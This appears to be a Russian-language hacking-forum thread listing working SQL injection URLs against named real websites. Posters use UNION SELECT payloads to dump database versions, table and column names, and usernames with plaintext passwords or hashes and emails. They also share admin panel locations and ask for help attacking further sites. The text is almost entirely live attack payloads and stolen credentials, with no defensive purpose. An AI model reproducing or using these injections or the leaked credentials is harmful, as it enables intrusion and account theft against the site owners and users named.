HTML: http://www.pilot-film.com/index.php?id=2+union+select+1,2,3,4,5,6,7,8,9,10,11/* блин опять затупил....
http://www.haifa.ru/article.php?id=-743+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9/*&Lang=Ru 5.0.45/[email protected]/haifaru_artcls ----------------------------------------------------------------------- http://www.muscul.ru/article.php?id=-5+union+select+1,2,concat_ws(0x2f,version(),user(),database()),4,5,6,7,8,9/* 4.1.22-log/musculr4_first@localhost/musculr4_main ----------------------------------------------------------------------- http://www.rustrana.ru/article.php?nid=-3435+union+select+concat_ws(0x2f,version(),user(),database()),2,3/* Вывод в тайтле)) ----------------------------------------------------------------------- http://www.chayka.com/article.php?id=-53+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10,11/* 5.0.45/seagullmag@localhost/seagullmag Все таблицы: http://www.chayka.com/article.php?id=-53+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables/* Все колонки: http://www.chayka.com/article.php?id=-53+union+select+1,column_name,3,4,5,6,7,8,9,10,11+from+information_schema.columns/* ----------------------------------------------------------------------- http://www.phpbuddy.com/article.php?id=-8+union+select+concat_ws(0x2f,version(),user(),database()),2,3,4,5,6/* 4.1.21-standard/phpbud22_phpbudd@localhost/phpbud22_phpbuddy ----------------------------------------------------------------------- http://www.michaelpollan.com/article.php?id=-80+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10/* 4.1.22-standard/pollan_article@localhost/pollan_articles ----------------------------------------------------------------------- http://www.mcpost.com/article.php?id=-418+union+select+1,2,3,concat_ws(0x2f,version(),user(),database()),5,6,7,8,9,10,11,12/* 4.0.27-log/mcpost@localhost/mcpost http://www.mcpost.com/article.php?id=-418+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users/* Можно через limit
http://www.uprava.org/section.php?id=235+union+select+0,1,2,3,4,5,column_name+from+uprava_org.razdels/* узнал только,что есть колонка id.Других помоему нет,перебрал все названия,что встретились в форме)).К другим таблицам я доступа не нашёл.
http://www.ipecac.com/bio.php?id=44+union+select+0,1,2,3/* Доступа нету ваапще:РР,зато запрос order+by пашет.
я занова перебрал... больше этого нечего недобился HTML: http://www.uprava.org/section.php?id=-1+union+select+1,2,concat(Version(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7/*
newyorkrecruiter.com HTML: http://www.newyorkrecruiter.com/job_browse.php?category_alpha=-1+union+select+USER(),VERSION(),DATABASE(),4/* USER:recnet2@localhost VERSION:4.1.20-log DATABASEortlandrecruiter_com_-_site HTML: http://www.newyorkrecruiter.com/job_browse.php?category_alpha=-1+union+select+username,password,3,4+from+users+limit+1,100/* Есть поля - username,password и таблица - users
5.0.45-log Admin:3e22c75c164803a3989a7d36c5efbff0 пароль не поддаёться ---------------------------------------------------------------------- 5.0.45- admin:amsrlpw01 де админка не знаю ((
Code: http://www.gimmeshelter.co.uk/ArtistInfo.php?user_id=99999+union+select+1,2,concat_ws(0x3a,username,password,email),4,5,6+from+user+limit+2,1/* [email protected] corrugated 5.0.24a-standard-log
HTML: http://www.bedesworld.co.uk/newsevents-news-story.php?newsId=59+union+select+1,concat(Version(),0x3a,USER(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/* акуратно вышло =)
http://www.cowparademilano.it/ HTML: http://www.cowparademilano.it/news_dettaglio.php?news_id=-137+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* 5.0.45-community-log:[email protected]:Sql167630_1 HTML: http://www.cowparademilano.it/news_dettaglio.php?news_id=-137+UNION+SELECT+1,concat_ws(0x3a,user_id,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+cp_user+LIMIT+0,1/* 2:cowparade:milano2007 http://www.stormensupport.no/ HTML: http://www.stormensupport.no/artikkel.php?news_id=-1533+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),2,3,4,5,6,7,8,9,10/* 4.1.11-Debian_4sarge7-log:stormensql@tor:stormen HTML: http://www.stormensupport.no/artikkel.php?news_id=-1533+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),0x71),0x71),2,3,4,5,6,7,8,9,10+FROM+users/* aafk:riise HTML: http://www.stormensupport.no/artikkel.php?news_id=-1533+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,user_password,user_email),0x71),0x71),2,3,4,5,6,7,8,9,10+FROM+phpbb_users+WHERE+user_id=2/* NoggyStyles:2e5de30321d8e0151a76c10f5f8df122:[email protected]::240982 Tante:61a1e25dd5c27f96825c84e452e268ce:[email protected]::ibb (модер) ... (http://www.stormensupport.no/forum/login.php)
Code: http://www.photostockplus.com/home.php?user_id=99999+union+select+concat_ws(0x3a,username,password,email),2,3,4,5,6,7,8,9,10,11,12+from+users+limit+2,1/* [email protected] hithop_photostock 4.1.20-log root:78945d315964d1e0 Code: http://www.cahiersdufootball.net/article.php?id=99999+union+select+1,2,3,concat_ws(0x3a,user ,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user/* ROOT:8B802B564368ADF78A06B7E873C3827E235A87CE CAHIERSDUFOOTBALLNET3 ROOT@LOCALHOST 5.0.21-LOG MICHEL : platini
curiocitytravel.com HTML: http://www.curiocitytravel.com/wNewsDetail.php?nId=-6+union+select+1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),3,4,5/*&lnId=1&cSe=1 USER:uv0642@localhost VERSION:4.1.14-log DATABASE:uv0642_curiocity
PR:3 Code: http://[COLOR=Red]www.togather.biz[/COLOR]/showcg.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* [email protected]:4.1.15-Debian_1-log:archi PR:3 Code: http://[COLOR=Red]www.dety.info[/COLOR]/tour.php?id=-182+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),user(),version(),database()),11,12,13,14/* [email protected]:4.0.27-max-logoisktur
http://www.hairbeauty.ru/art.php?ID=70000000+UNION+SELECT+1,2,concat_ws(0x3a,Login,Pass),4,5,6+from+AdUs/* Kanochkina:a510afa5581822667f2e01793c44be2b:27061960 sergey:c3c7b0e18a5373f727fa282d13143c11:11121934 misha:4b1130a31d98355e4590bbc3d1798bab artur:825d7a62a2b80323a4ab48502e2a6e32 kio306:e0cb81f8d2408e37f7b679ac1fb95e02 логин:пас хз откуда на сайт есть форум на 1к юзеров, но доступа к его базе нет
http://turotdih.ru/news_article.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/* 4.1.22-standard/maximwi_turotdih/maximwi_all@localhost ----------------------------------------------------------------------------- http://www.garantpost.ru/about/news/?y=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4/* 4.0.27-log/garant/[email protected] ----------------------------------------------------------------------------- elephant-odessa.com http://elephant-odessa.com/rus/archive.php?nid=-1'+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5/* 4.1.22/elephantodessa/u_elephantod@localhost Админка : http://elephant-odessa.com/admin Логин/пароль к админке http://elephant-odessa.com/rus/archive.php?nid=-1'+union+select+1,2,3,concat_ws(0x2F,username,password),5+from+users/* admin/[jkjlbkmybr2005
Помогите раскрутить Code: http://greaterphoenixleadership.org/ Запрос писать в Username и Password =)
